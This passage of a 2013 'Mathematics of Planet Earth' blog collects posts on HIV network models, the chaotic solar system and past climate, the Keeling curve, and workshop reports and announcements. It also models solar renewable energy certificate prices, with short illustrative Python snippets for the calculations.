    Fresh out of grad school, she was giving a talk to a group of African academics and public health workers on her dissertation, which explored how age differences between sexual partners might be related to the spread of the HIV virus. As she described the mathematical model she used in her research, a man in the audience abruptly stood up. “Can your model handle people having more than one partner at a time?” he asked.

    Her research, developed over time into a sophisticated model, now suggests that minor variations in sexual concurrency can lead to vast increases in overall transmission of HIV.

    Small Change

    At the upcoming June 17 – 21, 2013 AIM workshop “Exponential random network models,” Martina will join fellow organizers Sourav Chatterjee, Persi Diaconis, and Susan Holmes to study these and related problems, with the goal of bringing social scientists and statisticians who study exponential random graph models into contact with an emerging group of mathematicians who use a variety of new tools, including graph limit theory and tools from statistical mechanics such as spin glasses.

    Here is an excerpt from the Morris website explaining in more detail the limitations of current models of transmission. The goal is to use random graph models to estimate the network parameters and to simulate evolving networks.

    “Because infectious diseases are transmitted from person to person, our understanding of disease transmission and prevention are rooted in a theory of population transmission dynamics. The epidemiology of sexually transmitted diseases (STD) like HIV – how quickly they spread and who gets infected – is driven by the network of person-to-person contacts. Early epidemiological studies and mathematical models of this process provided a number of insights that led to changes in STD control strategies during the 1980s. With the advent of HIV, however, new challenges have emerged. Like other incurable infections, HIV has the potential to spread very broadly in a population under the right circumstances. This makes the “core group” concept from the 1980s somewhat less effective for HIV prevention. Much work has been done during the last 15 years to identify which aspects of the partnership network structure matter for the spread of HIV, and to collect data on partnership networks in many populations. Simulation studies have played a crucial role in this effort, by identifying the type of network structures that have large impacts on transmission dynamics. The confluence of data, theory, and methods has created a clear agenda for quantifying the influence of networks on HIV transmission risks. While many of the pieces of the emerging research program are now in place, there is a wide gulf between the network data and the current simulation modeling frameworks. Simulations typically create network effects indirectly, by varying parameters of some convenient function to produce a change in simulated networks. The observable network measures are thus outcomes of the model, rather than inputs. While this strategy has been very useful for orienting initial research, it has hamstrung our ability to evaluate the empirical transmission risk in observed networks.”

    Posted in Epidemiology, Mathematics, Public Health | 1 Comment

    Earth’s Climate at the Age of the Dinosaurs

    Is it possible to compute the past climate of the Earth at the time of dinosaurs? This question was answered by Jacques Laskar during his lecture entitled “Astronomical calibration of the Geological Time Scales” at the workshop “Mathematical models and methods for Planet Earth” at Istituto Nazionale di Alta Matematica (INdAM) on May 27-29.

    Laskar explained that Joseph-Louis Lagrange was the first to suggest a link between the past climates of the Earth and the variations of the parameters characterizing the Earth’s elliptical orbit: the changes in the major axis, in the eccentricity, in the obliquity of the Earth’s axis, and in the precession of the Earth’s axis. These parameters undergo periodic oscillations, now called the Milankovitch cycles, with periods ranging from roughly 20,000 to several hundred thousand years. These oscillations essentially come from the attraction exerted on the Earth by the other planets of the solar system. They have some influence on the climate, for instance when the eccentricity of the ellipse changes. The oscillations of the Earth’s axis also influence the climate: when the axis is more slanted, the poles receive more Sun in summer but the polar ice spreads more in winter. Scientists compare the computed oscillations of the parameters of the Earth’s orbit with measurements from ice cores and sedimentary records, and the two show a clear correlation between past climates and the orbital variations.

    But how do we compute these oscillations? We use series expansions to approximate the motion of the Earth when taking into account the attraction of the other planets of the solar system. But these series are divergent, as was shown by Poincaré. Hence, the series can only provide precise information over a limited period of time. Jacques Laskar showed in 1989 that the inner planets of the solar system are chaotic, and he confirmed this in 2009 with 2,500 parallel simulations of the solar system. One characteristic of chaos is sensitivity to initial conditions, which means that errors grow exponentially in time. Hence, inevitably, the errors of any simulation will grow so much that we can no longer learn anything reliable from the simulation. The whole question is then: how fast do these errors grow?

    This is measured by the Lyapunov time, which we will define here as the time before we lose one digit of precision—that is, the time over which the error is multiplied by 10. When modeling the planets, this Lyapunov time is 10 million years. The extinction of the dinosaurs took place 65 million years ago, and simulating the solar system over 70 million years we lose 7 digits of precision. This is a lot, but it is still tractable, and it is relatively easy to prove that the Earth is “stable” at this time horizon. But when we speak of the influence of the parameters of the Earth’s orbit on the climate, we need more precision. It does not suffice to include in the simulations all planets of the solar system as well as the Moon and the mean effect of the asteroid belt. The largest asteroids have to be considered individually, and some of them play a role. The two largest are Ceres and Vesta. Both are highly chaotic, with Lyapunov times of 28,900 years and 14,282 years, respectively. These asteroids are sufficiently large to have an influence on the orbit of the Earth, and there are other chaotic asteroids in the asteroid belt. Imagine: for each million years, the errors coming from Ceres are multiplied by $10^{34}$ and those from Vesta by $10^{70}$! In the paper “Strong chaos induced by close encounters with Ceres and Vesta,” published in 2011 in Astronomy and Astrophysics, Jacques Laskar and his co-authors showed that we hit a wall and cannot obtain any reliable information past 60 million years. Hence, we may deduce the climate at the time of the dinosaurs from geological observations, but there is no hope of computing it through backward integration of the solar system.
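    The arithmetic behind these figures is simple enough to check in a few lines, with the Lyapunov time taken, as above, to be the time over which errors grow tenfold:

        def digits_lost(horizon_years, lyapunov_time_years):
            """Decimal digits of precision lost over a simulation horizon."""
            return horizon_years / lyapunov_time_years

        print(digits_lost(70e6, 10e6))    # planets over 70 Myr: 7 digits
        print(digits_lost(1e6, 28_900))   # Ceres, per million years: about 34.6 digits
        print(digits_lost(1e6, 14_282))   # Vesta, per million years: about 70 digits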

    Christiane Rousseau

    Posted in Astrophysics, Mathematics, Paleoclimate | Leave a comment

    Ode to Cinderella Science

    Recently, while preparing a chapter on the Mauna Loa CO${}_2$ data for a forthcoming book [1], I came across an interesting article by Euan Nisbet in Nature [2]. The article was written in 2007, on the occasion of the 50th anniversary of the measurement program responsible for the longest continuous recording of atmospheric carbon dioxide.

    Keeling Curve

    Looking back, the “Keeling curve” of CO${}_2$ concentrations ranks among the most significant achievements of twentieth-century science. It established the connection between rising atmospheric CO${}_2$ concentrations and fossil-fuel burning, and provided conclusive evidence that a substantial fraction of the CO${}_2$ released by humans into the atmosphere was not removed by the biosphere. The Keeling curve changed our view of the world.

    But the perspective at the time was quite different. Monitoring is science’s Cinderella, unloved by the scientific community and poorly rewarded. It does not win glittering prizes, and publication nowadays is most often relegated to a Web site. Charles David Keeling’s 1960 paper [3] documenting the seasonal cycle and, more ominously, the annual rise in CO${}_2$ garnered citations slowly. The account of his tribulations, “Rewards and Penalties of Monitoring the Earth” [4], should be compulsory reading for politicians and science administrators. His work was often threatened, as is attested by a gap in the data in 1964 when underfunding briefly halted the measurements. At one point, his program managers ordered Keeling to guarantee two discoveries per year!

    In hindsight, Keeling was ahead of his time. He realized that, if we want to learn more about Earth’s climate system, we need more than models—we need data to test and improve our models. Mathematics owes a great debt to the Cinderella scientists.

    [1] Hans G. Kaper and Hans Engler, Mathematics and Climate, Society for Industrial and Applied Mathematics (SIAM), to be published (2013).
    [2] Euan Nisbet, “Cinderella Science,” Nature, Vol. 450, 789-790 (2007).
    [3] Charles D. Keeling, “The Concentration and Isotopic Abundances of Carbon Dioxide in the Atmosphere,” Tellus, Vol. 12, 200-203 (1960).
    [4] Charles D. Keeling, “Rewards and Penalties of Monitoring the Earth,” Annual Review of Energy and the Environment, Vol. 23, 25–82 (1998).

    Posted in Carbon Cycle, Climate Change | Leave a comment

    Fighting Crime with Numbers

    UCLA Professor Andrea Bertozzi gave a lecture at the University of Alberta on April 5th about the mathematics of crime. Dr. Bertozzi is applying the powerful tools of mathematics and big-data analysis to map crime patterns – with implications for crime prevention. Read the full article in the Edmonton Journal of May 11, 2013.

    Posted in Data Visualization, Social Systems | Leave a comment

    Modeling the Progression and Propagation of Infectious Diseases

    Math of Planet Earth 2013, in addition to dealing with the Earth itself (climate, earthquakes, etc.), also deals with the biosphere and humanity’s relationship to it. Certainly the progression and propagation of infectious diseases is an important part of this. Two articles, written for a general audience, provide examples from the applied mathematics literature that show how mathematics is used to model and understand the progression and propagation of certain kinds of infections.

    The first article analyzes early viral dynamics in HIV infections with the goal of ultimately better understanding treatment and prevention strategies.

    The second article also concerns HIV infection, dealing with “viral blips” — episodes of high viral production interspersed with periods of relative quiescence. These quiescent or silent stages are hard to study with experimental models. The article explores how certain mathematical models and analysis can help our understanding.

    Both articles are based upon recent papers that appeared in the SIAM Journal on Applied Mathematics.

    Posted in Disease Modeling, Mathematics | Leave a comment

    INdAM Workshop “Mathematical Models and Methods for Planet Earth”

    The workshop “Mathematical Models and Methods for Planet Earth,” organized by the Italian National Institute for Advanced Mathematics (INdAM) under the auspices of MPE2013 in Rome, May 27-29, finished a few days ago.

    The workshop offered an interesting view of the broad spectrum of ongoing applications of mathematics to life on our planet.

    Several presentations focused on the dynamics of planet Earth. Since Earth is a celestial body in the solar system, it is exposed to hazardous impacts with other natural or artificial objects (e.g., meteorites or space debris). It is also the starting point of space missions designed by applying new concepts. Earth provides a delicate environment for millions of different life forms; thus, some talks were devoted to the dynamics of the Earth’s interior, its oceans and climate (including its evolution on geological time scales). Moreover, science must consider human beings and their activities; thus, a significant part of the workshop focused on mathematical models of problems in medicine, biology, social prevention, economics, politics, internet diffusion, etc.

    All the speakers made a substantial effort to avoid overly technical content, so their presentations were accessible to a highly heterogeneous audience. The slides presented at the workshop are currently being collected and will be made available here.

    It is now time for the participants to relax and process at least part of the concepts and ideas presented at the workshop. Synthesizing the new trends in this kind of applied mathematics is a big effort, but it is worth a try.

    Let us start with the provocative question raised by one of the speakers (J. Laskar) at the end of the beautiful public lecture by Christiane Rousseau: “Nowadays, what can the Earth do for Mathematics?” At that moment, the question sounded like a bizarre attempt to reverse the problem: this kind of rhetorical argument can be very useful for improving the understanding of a broad problem, but it is not always meaningful. However, the question is extremely natural for people working in celestial mechanics, as was shown with a beautiful example in the last talk: the study of the secular variations of the planetary orbital elements pushed Lagrange and Laplace to introduce solutions of systems of linear differential equations. It took me a long time to realize that Laskar was probably referring to the changes experienced in the relation between applied mathematics and other fields of science in the past few decades.

    Astronomy and physics were the main (perhaps the only) sources of problems that enabled the birth of new branches of mathematics until the beginning of the 20th century. In this context, it is important to recall that, in Hilbert’s list of 23 unsolved problems presented at the International Congress of Mathematicians in Paris in 1900, just one concerned a topic outside pure mathematics: the axiomatization of physics. Moreover, in the past, the genesis of great ideas has often resulted from a beautiful interaction: experimental measurements with a few significant digits were explained by the “first order” of a new theory, whose refinements were then found to agree with more precise new measurements. Examples include the discovery of the law of gravitation together with the two-body model, and quantum mechanics together with the study of the light emission of the hydrogen atom. This scenario of continuous, fruitful interaction between mathematics, theoretical physics and the technology behind experimental measurements seems to have lost its nice simplicity. Nowadays, the amount of data in some scientific problems is often overwhelmingly large (as explained in Perozzi’s talk). Most of the speakers showed that in the last century mathematics was applied to many fields other than physics (e.g., game theory, the dynamics of biological populations, etc.).

    The apparent loss of simplicity in the relations between mathematics and its applications is not by chance. The problems arising in the sciences that study the Earth and the evolution of life presently point to a common Grand Challenge: complexity. The mathematical approaches shown in the talks at the workshop deal with complexity in various ways. First of all, mathematics is often used to extract meaningful information from huge amounts of data: even literary textual data can be successfully analyzed and classified by applying statistical concepts! Moreover, mathematics plays an extremely important role in providing well-defined models to study problems properly. In this context, the approach often defines a sort of “Russian doll” structure of models of increasing difficulty. In particular, this was seen in some talks based on probabilistic techniques: a set of equations depending on many parameters is first set up; then some of the parameters are switched off, so as to make the behavior of the system predictable (sometimes numerically, other times analytically) and comparable with some expected or known phenomenon. Finally, the system is studied again with the previously neglected parameters restored. In full generality, the systems considered often generate many open subproblems that are hard to solve from a mathematical point of view. On the whole, mathematics is now needed not only to provide solutions but also to set up well-posed problems.

    As a final comment on the INdAM MPE2013 initiative, let us consider the new trends among people working in mathematics. Everybody can see that complexity often makes things more complicated, and thus mathematicians in universities and research centers are increasingly specialized in their own fields of interest. Who can now master as many mathematical subjects as Poincaré or Hilbert did a century ago? All the speakers at the workshop clearly showed that mathematicians are now also challenged in the opposite direction: more and more research topics require deep mathematical knowledge, often to tackle problems as part of a team. Abstraction can keep mathematics pure, but mathematicians are increasingly asked to be part of the broader scientific community.

    Ugo Locatelli
    Univ. of Rome “Tor Vergata”

    Posted in Conference Report, Mathematics | 1 Comment

    The Mathematics Behind Biological Invasions — An MPE Event

    The Pacific Institute for the Mathematical Sciences (PIMS) is organizing a Mathematical Biology Summer School at the University of Alberta in Edmonton, Canada, May 27-June 14, 2013, on a topic highly relevant to Mathematics of Planet Earth, namely “The Mathematics Behind Biological Invasions”.

    Humans have introduced most of the alien species found worldwide. If these species manage to survive, reproduce, spread and finally harm a new environment, they are called invasive. Invasive species can change habitats and ecosystem processes, crowd out native species or damage human activities, ultimately costing the global economy an estimated \$1.4 trillion per year. The dramatic progression of an invasion involves a series of complex dynamical processes that require sophisticated mathematical language to describe, quantify and investigate. This summer school focuses on the development and analysis of mathematical models that have been and can be applied to these processes.
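
    As a taste of the kind of model the school will study, a classical starting point for spatial spread is the Fisher-KPP reaction-diffusion equation, whose traveling waves move at speed $2\sqrt{rD}$. The Python sketch below is purely illustrative; the parameter values and discretization are ours, not part of the school’s material.

```python
import numpy as np

# Minimal Fisher-KPP invasion model, u_t = D u_xx + r u (1 - u), solved with
# an explicit finite-difference scheme.  Traveling-wave theory predicts an
# asymptotic invasion speed of 2*sqrt(r*D).

D, r = 1.0, 0.5                    # diffusion and growth rates (illustrative)
L, nx = 200.0, 2000                # domain length and number of grid points
dt, nt = 0.004, 25_000             # time step chosen so that D*dt/dx^2 < 1/2
x = np.linspace(0.0, L, nx)
dx = x[1] - x[0]
u = np.where(x < 5.0, 1.0, 0.0)    # invader initially occupies the left edge

for _ in range(nt):
    lap = (np.roll(u, -1) - 2.0 * u + np.roll(u, 1)) / dx**2
    lap[0] = lap[-1] = 0.0         # crude no-flux boundaries
    u = u + dt * (D * lap + r * u * (1.0 - u))

front = x[np.argmax(u < 0.5)]      # first point where density drops below 1/2
print(f"front position {front:.1f}, predicted speed {2*np.sqrt(r*D):.2f}")
```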

    The summer school is based on three components: lectures, computer labs and group projects. The first two weeks will focus on the lectures and computer labs. Four international Distinguished Lecturers will give the lectures, and the computer labs will apply their lecture material to the modelling and analysis of real biological invasions. The focus of the last week will be group projects, where students will apply their modelling, mathematical and computational skills to solving problems in the area of biological invasions.

    This event is organized primarily by Thomas Hillen from the University of Alberta. The main lecturers are Alan Hastings (UC Davis, USA), Mark Lewis (University of Alberta, Canada), Jonathan Sherratt (Heriot Watt University, UK) and Sergei Petrovskii (Leicester University, UK).

    This summer school is an activity sponsored by the PIMS International Graduate Training Centre in Mathematical Biology, which is a training program focused on recruiting and supporting graduate students in this important interdisciplinary area in Western Canada. More information can be found here.

    Alejandro Adem
    PIMS

    Posted in Ecology, Mathematics, Workshop Announcement | Leave a comment

    MPE-Related News Items

    Several articles in the past few weeks have caught my attention.

    One that I really liked is an article in the New Yorker that describes two guys who have started a company that makes packing material out of green waste injected with mycelium (the substance that provides structure to mushrooms). It breaks down after a relatively short time (unlike styrofoam, which breaks down into styrene particles – observed like snowflakes all over the Jersey shore after Sandy – and which are carcinogenic). They were spurred on by a course on inventions they took at RPI from the very persistent and knowledgeable Professor Burt Swersey. It’s a great story!

    A second story was in an article in the Mercury News about Jerry Brown seeming to be concerned about the environment but not being willing to put California’s money where his mouth is. According to the article, Brown said to an audience at the Sustainable Silicon Valley’s fourth annual Water, Energy and Smart Technology (WEST) Summit at NASA Ames Research Center:

    “[$\ldots$] that clearly communicating the argument that the world must act now is crucial because news media too often neglect climate change stories in favor of more titillating journalism, while lawmakers won’t act unless confronted with concrete, consensus-backed facts. `We’re really in a war here, a contest for ideas, and this crowd is on the losing end,’ he told the scientists. Just like in electoral politics, `your base is important, but you’ve got to convince the swing voter to win,’ the Democratic governor said.”

    It seems to me that Brown deserves a lot of credit for getting California back on its feet – there is a reported surplus in this year’s state budget, estimated at between one and four billion dollars. But Brown is being very conservative about committing this surplus to program spending. Still more persuasive arguments about the imperative of dealing with environmental issues are needed.

    This brings me to a third story, which asks whether we can “geo-engineer” our way out of the mess we seem to have gotten the Earth into. For example (far-fetchedly), could we build giant vacuum cleaners that suck some of the carbon dioxide out of the atmosphere? The author warns about messing with something as large and unpredictable as the entire Earth’s climate system (remember the mathematician’s warning in Jurassic Park?). He also warns against assuming that we can always engineer our way out of any situation we get into – one consequence being that we become carelessly overconfident. Kent Morrison comments: “One thing about math is that we know what we know and what we don’t know. Geo-engineering is quite the opposite.”

    A fourth story (many sources) is about the Oklahoma Senators, Inhofe and Coburn, who opposed relief aid for Sandy yet are requesting Oklahoma tornado aid from FEMA. I’m sure that I’m being hopelessly naive, but it seems to me that there should be a (mathematical!) estimate of what FEMA needs on average per year and that, when there is an emergency, an independent board should decide how to allocate the funds. Having our congressional bodies vote on each allocation is ridiculous: it politicizes yet another aspect of our lives that politics should not enter.

    Finally, I want to mention the New York Times editorial “The wisdom of Bob Dole” about Bob Dole’s lamentations on Fox News Sunday about the current incarnation of the Republican Party, which he’s pretty sure neither he nor Ronald Reagan would be welcome in. The New York Times writes

    “Its (the Republican Party’s) members want to dismantle government, using whatever crowbar happens to be handy, and they don’t particularly care what traditions of mutual respect get smashed at the same time. [$\ldots$] This corrosive mentality has been standard procedure in the House since 2011, but now it has seeped over to the Senate. Mr. Rubio is one of several senators who have blocked a basic function of government: a conference committee to work out budget differences between the House and Senate so that Congress can start passing appropriations bills. They say they are afraid the committee will agree to raise the debt ceiling without extorting the spending cuts they seek. One of them, Ted Cruz of Texas, admitted that he didn’t even trust House Republicans to practice blackmail properly. They have been backed by Mitch McConnell, the minority leader, who wants extremist credentials for his re-election.”

    Our system is being “gamed” in new ways. Are we stuck in this morass? What, if anything, does game theory predict about the future of our current quandary of having rule-making bodies that cannot actually agree on any rules?

    Posted in Climate, General, Mathematics, Political Systems, Resource Management, Sustainability | Leave a comment

    SIAM Conference on Applications of Dynamical Systems, Snowbird, May 19-23

    The SIAM Activity Group on Dynamical Systems (SIAG/DS) held its biennial meeting (DS13) at the Snowbird Ski and Summer Resort in Snowbird, Utah, May 19-23, 2013. The meeting was attended by more than 800 participants from academia, industry, and the national laboratories. The program featured nine invited lectures, 136 minisymposia, 191 contributed papers, and 88 posters.

    Many events at DS13 related to MPE2013. I especially liked the invited lecture by Paul Johnson (Los Alamos National Laboratory), who illustrated the crucial role of granular materials in the triggering of slip processes in the Earth’s crust. Other invited lectures of interest were given by Adrian Constantin (Imperial College London) on particle trajectories beneath irrotational traveling water waves and Jean-Luc Thiffeault (U Wisconsin, Madison) on the topology of fluid mixing.

    A new feature of the program was a daily set of four “Featured Minisymposia.” These minisymposia had been selected by the conference organizers because they might attract a broader audience than regular minisymposia. The organizer of a Featured Minisymposium was asked to give an introduction to the topic area in the first talk, and each of the speakers had five more minutes for their presentation (20+5 minutes, as opposed to 15+5 minutes in a regular minisymposium). As chair of the SIAG/DS I had the privilege of organizing a Featured Minisymposium on “Dynamics of Planet Earth” (MS38), described in an earlier blog posted on May 15. The other Featured Minisymposium which I particularly enjoyed was “Dynamics of Marine Ecosystems” (MS97), organized by Drew LaMar and Leah Shaw (College of William and Mary). Two minisymposia were of special interest to the climate research community: “Hierarchical Modeling of Sea Ice” (MS36), organized by Renate Wackerbauer (University of Alaska, Fairbanks), and “Data Assimilation: Ensemble, Lagrangian, and Parameter Estimation” (MS109), organized by Tom Bellsky (Arizona State University, Ed Lorenz Postdoc with the Mathematics and Climate Research Network).

    For those of us interested in issues of climate and sustainability, there were many noteworthy contributions in regular minisymposia, contributed paper sessions and the poster session. I mention the talks by Esther Widiasih (ASU) and Anna Berry (U Minnesota) on non-smooth energy balance models, Karna Gowda (Northwestern U) on Turing patterns for semi-arid ecosystems, and the posters by Adam Mallen (Marquette U) on assimilation of Lagrangian ocean data and Eric Siero (Leiden U) on vegetation patterns under slowly varying conditions. [With apologies to all the presenters not listed here.]

    Details of the conference program can be found here.

    The invited lectures and some of the minisymposia have been recorded and will be posted on-line at SIAM Presents.

    The next SIAM Conference on Applications of Dynamical Systems will be held at Snowbird, May 17-21, 2015.

    Posted in Climate, Conference Report, Mathematics | Leave a comment

    Mathematics shines some light on the growing markets for solar renewable certificates

    In recent years, governments around the world have experimented with many different policy tools to encourage the growth of renewable energy. In particular, it is clear that subsidies are needed to stimulate investment in clean technologies like wind and solar that are not yet able to compete effectively on cost alone (especially in the US today, where cheap natural gas is showing the potential to dominate!). Economists, politicians and journalists actively debate the merits and limitations of various subsidies, tax incentives, or of feed-in tariffs in electricity markets, popular in many European countries. However, an interesting alternative is also growing rapidly at the state level in the US: markets for tradable renewable energy certificates (RECs), or as a subcategory, solar renewable energy certificates (SRECs). Here we discuss the vital role that mathematics can play in helping to better understand these important new markets.

    Over the last decade or so, about 30 states have implemented specific targets for renewable energy growth as part of a so-called Renewable Portfolio Standard (RPS). Among these, many have a specific “solar carve-out,” a target for the solar sector in particular, in addition to renewables overall. To achieve these goals, about 10 states have launched SREC markets, with New Jersey (NJ) being the largest and most ambitious so far (targeting 4.1% solar electricity by 2028). It is worth noting that similar markets for “green certificates” also exist in various countries around the world.

    The basic idea is that the government sets specific requirement levels for solar energy in the state in each future year as a percentage of total electricity generation. Throughout each year, certificates (SRECs) are issued to solar generators for each MWh of solar power that they produce. These can then be sold in the market to utility companies, who must submit the required number of SRECs at each compliance date (once per year). Anyone not meeting the requirement must instead pay a penalty, known as the SACP (Solar Alternative Compliance Payment), which is typically chosen to decrease from year to year, but has been as high as \$700 per MWh in the New Jersey market.
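
    A toy illustration of the compliance arithmetic (all numbers hypothetical): a utility covers as much of its obligation as it can with SRECs bought in the market and pays the SACP on any shortfall.

```python
# Toy compliance cost for a utility (numbers hypothetical): buy SRECs at the
# market price, then pay the penalty (SACP) on any remaining shortfall.

def compliance_cost(required_srecs, srecs_bought, srec_price, sacp):
    shortfall = max(required_srecs - srecs_bought, 0)
    return srecs_bought * srec_price + shortfall * sacp

# Owing 10,000 SRECs, buying 8,000 at $100 each, and paying a $700 SACP
# on the remaining 2,000 costs $2.2 million.
print(compliance_cost(10_000, 8_000, 100.0, 700.0))   # 2200000.0
```

    The penalty therefore acts as a cap on the SREC price: no rational buyer would pay more than the SACP for a certificate.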

    While the concept is straightforward and intuitive (and parallels that of a cap-and-trade market for CO2 emissions), the implementation is far from simple, with different states already trying many variations for setting future requirement and penalty levels. Another important policy consideration is the number of “banking” years permitted, meaning how long SRECs remain valid for compliance after they are first issued (e.g., currently a 5-year lifetime in NJ). A fundamental challenge for regulators is trying to choose appropriate requirement levels many years in advance, such that the market does not suddenly run into a large over- or undersupply of certificates, causing prices to swing wildly.

    In New Jersey for example, SREC market prices dropped from over \$600 throughout most of 2011 to under \$100 by late 2012 in the wake of a huge oversupply, and this despite a major rule change passed in 2012 (more than doubling the 2014 requirement) to help support price levels. On the one hand, the large oversupply was good news, signaling the success of the SREC market in enabling solar in NJ to grow very rapidly between 2007 and 2012 (from under 20MW to nearly 1,000MW of installed capacity). On the other hand, this initial success of the market brings with it some risk for its future. At only \$100 an SREC and with the possibility of further price drops, will investors now shy away from new solar projects?

    Like all financial markets, SREC markets can provide very rewarding opportunities for investing (in new solar farms in this case). But they also come with significant risk due to volatile price behavior. Financial mathematics, a field that has grown rapidly over several decades now, is well versed in analyzing and modeling such risks and returns. However, most financial mathematicians work on classical markets for stocks or bonds, instead of venturing into the peculiarities of commodity prices, and even more so those of RECs. Nonetheless, commodities, energy and environmental finance is a rapidly growing subfield and popular research area these days (see for example the May 7th blog post on the Fields Institute’s activities).

    So how can mathematical modeling help us to better understand SREC markets? And why is it important to do so? In recent and ongoing work at Princeton University [1], we propose an original approach to modeling SREC prices, which is able to reproduce New Jersey’s historical price dynamics to an encouraging degree. Drawing on some ideas from existing literature in carbon allowance price modeling, we create a flexible framework that can adapt to the many rule changes that have occurred. In particular, we treat SREC prices as combinations of “digital options” on an underlying process for total solar power generation, since SRECs essentially derive their value from the probability of the market being short of certificates and paying a penalty at one or more future compliance dates. However, a key additional challenge comes in capturing an important feedback effect from prices onto the stochastic process for generation. As today’s prices increase, future generation growth rates should also increase (as more solar projects are built), which in turn reduces the probability of future penalty payments, feeding back into today’s price. An equilibrium price emerges, which can be solved for via dynamic programming techniques.
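
    The model in [1] is considerably richer (multiple compliance years, banking, and the price-generation feedback just described), but the core “digital option” idea can be sketched in a few lines. Everything below — the lognormal generation process, the parameter values, the single compliance date, and the omission of feedback — is an illustrative simplification of ours, not the authors’ implementation.

```python
import numpy as np

# Single-period sketch: the SREC price equals the discounted penalty (SACP)
# times the probability that cumulative solar generation falls short of the
# requirement at the compliance date -- a "digital option" on generation.
# The feedback of prices onto generation growth is deliberately ignored here.

rng = np.random.default_rng(0)

def srec_price(gen_now, requirement, sacp, mu, sigma, T, r, n_paths=100_000):
    # Assume generation at the compliance date is lognormally distributed.
    z = rng.standard_normal(n_paths)
    gen_T = gen_now * np.exp((mu - 0.5 * sigma**2) * T + sigma * np.sqrt(T) * z)
    prob_short = np.mean(gen_T < requirement)
    return np.exp(-r * T) * sacp * prob_short

# Illustrative inputs only: one year to compliance, 20% expected generation
# growth, 30% volatility, and a requirement 10% above current generation.
print(srec_price(gen_now=1.0, requirement=1.1, sacp=700.0,
                 mu=0.20, sigma=0.30, T=1.0, r=0.03))
```

    With the feedback of prices onto generation growth included, the price becomes a fixed point of this kind of calculation, which is where the dynamic programming techniques mentioned above come in.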

    The approach just described is an example of a “structural” model, which combines economic fundamentals of supply and demand with tractable stochastic processes and convenient mathematical relationships. The academic literature on energy-price modeling covers a wide range of different approaches and makes use of a diverse set of mathematical tools, from partial differential equations (PDEs) to stochastic processes, optimization and statistical estimation procedures. The feedback discussed above has even been shown to produce interesting applications of complicated forward-backward stochastic differential equations (“forward-backward SDEs”) in the case of carbon markets. Nonetheless, the specific application to SREC markets is extremely new, and we hope to encourage more research in this young and exciting field.

    Understanding the behavior of SREC prices is crucial both for investors contemplating a new solar project and for regulators determining how best to design the market or set the rules. How does price volatility vary with regulatory policy? For example, can we effectively implement a requirement growth rule which dynamically adapts to the shortage or surplus of SRECs in the previous year (as has in fact been attempted in Massachusetts)? Can this avoid the need for frequent legislation to rewrite the rules at great uncertainty to all market participants? How can we best avoid sudden price swings, while preserving the attractive features of these markets and their ability to stimulate the growth of solar? While our model allows us to begin to address such important market design issues, many interesting and relevant questions remain to be investigated, and we look forward to continuing to explore this promising new area of applied mathematics!

    The reference for our first paper on this topic is given below. For further details on the NJ SREC market, the websites of NJ Clean Energy, SREC trade and Flett Exchange all provide useful and up-to-date information.

    [1] M. Coulon, J. Khazaei, and W. B. Powell, “SMART-SREC: A Stochastic Model of the New Jersey Solar Renewable Energy Certificate Market,” working paper, Dept. of Operations Research and Financial Engineering, Princeton University.

    Michael Coulon
    Princeton University
    mcoulon@Princeton.EDU

    Posted in Economics, Finance, Renewable Energy | Leave a comment

    INdAM Workshop — “Mathematical models and methods for Planet Earth”

    The National Institute of Advanced Mathematics (INdAM) has organized a Workshop on “Mathematical models and methods for Planet Earth,” which will take place in Rome, Italy, on May 27-29, 2013. This MPE2013 event is organized by Alessandra Celletti (Università di Roma Tor Vergata), Ugo Locatelli (Università di Roma Tor Vergata), Tommaso Ruggeri (Università di Bologna) and Elisabetta Strickland (Università di Roma Tor Vergata). An international group of mathematicians with expertise in a wide range of application areas will present results on several themes related to MPE2013. Information on the workshop is available on the Workshop Web site.

    The National Institute of Advanced Mathematics (INdAM) is an Italian partner of MPE2013. Founded in 1939 by the noted mathematician Francesco Severi, INdAM aims to train researchers in mathematics, especially in emerging areas of research; to foster the transfer of knowledge to technological applications; and to support contacts between Italian and international mathematical research. To achieve its objectives, INdAM promotes fellowships from the undergraduate level to experienced researchers and organizes workshops, meetings and schools.

    Speakers at the workshop will discuss mathematical methods and stochastic models to understand emerging collective behavior in complex systems arising, for example, in the social, economic and behavioral sciences, where large numbers of units interact. They will illustrate the important role of mathematical modeling and simulation in biology and medicine, with applications ranging from the behavior of cells and tissues to the description of tumor growth. The leading role of mathematics to support our planet will be further illustrated by the attribution of authorship of literary texts and by models for future internet information dissemination.

    Besides the investigation of human-related aspects, mathematics enables the study of the physical characteristics of our planet. Most notably, some talks will be devoted to the calibration of geological time scales (a crucial aspect which allows us to retrieve specific events in Earth’s history), to the investigation of boundary layers associated with large-scale ocean circulation and, going up into the atmosphere, to the study of Earth’s climate variability and change using the theory of dynamical systems.

    Safeguarding planet Earth is not limited to the planet itself and its atmosphere. Since the Earth is part of the solar system, we must also investigate its interaction with the other neighboring bodies populating our universe. The N-body problem enables us to study the stability of the Earth’s dynamics as well as to devise new interplanetary trajectories. The recent impact of the meteorite at Chelyabinsk (Russia) highlighted the need to develop mitigation strategies to safeguard planet Earth from near-Earth asteroid hazards. Lastly, we must also be concerned about the space debris from decommissioned satellites and fragments, which forms a dangerous envelope surrounding the Earth: a mathematical investigation of the dynamics of space debris has become urgent.

    A special event at the workshop will be the public lecture by Christiane Rousseau (Université de Montréal), vice-president of the International Mathematical Union. The title of the lecture is “Mathematics of Planet Earth”. The talk will deal with the complexity of the Earth as a whole and will highlight the role of mathematics in protecting and discovering our planet.

    The joint effort of all scientists participating in MPE2013 will show that our planet is the setting for all sorts of dynamic processes. The challenges facing our planet and our civilization are multidisciplinary and multifaceted: the mathematical sciences play a central role in the scientific effort to understand and deal with these challenges. MPE2013 will also enable us to train a new generation of researchers working on scientific problems that will motivate students by providing stimulating answers to questions like “What is mathematics good for?”

    We conclude by quoting Marta Sanz-Solé, President of the European Mathematical Society, who pointed out, at the MPE Day held at the UNESCO Headquarters in Paris on March 5, that “The MPE2013 initiative will expose mathematicians to the whole world, by showing their usefulness and stimulating research. From now on, mathematics can be no more associated to pure intellectual exercise without connection to the most important problems of mankind.” We hope that the INdAM workshop will contribute to the goals of MPE2013.

    Alessandra Celletti and Elisabetta Strickland
    Università di Roma Tor Vergata

    Posted in Mathematics, Workshop Announcement | Leave a comment

    BIRS Workshop — “Non-Gaussian Multivariate Statistical Models and their Applications”

    A diverse group of 42 scholars from 15 countries converged this week at the Banff International Research station (BIRS) for a workshop on “Non-Gaussian Multivariate Statistical Models and their Applications.”

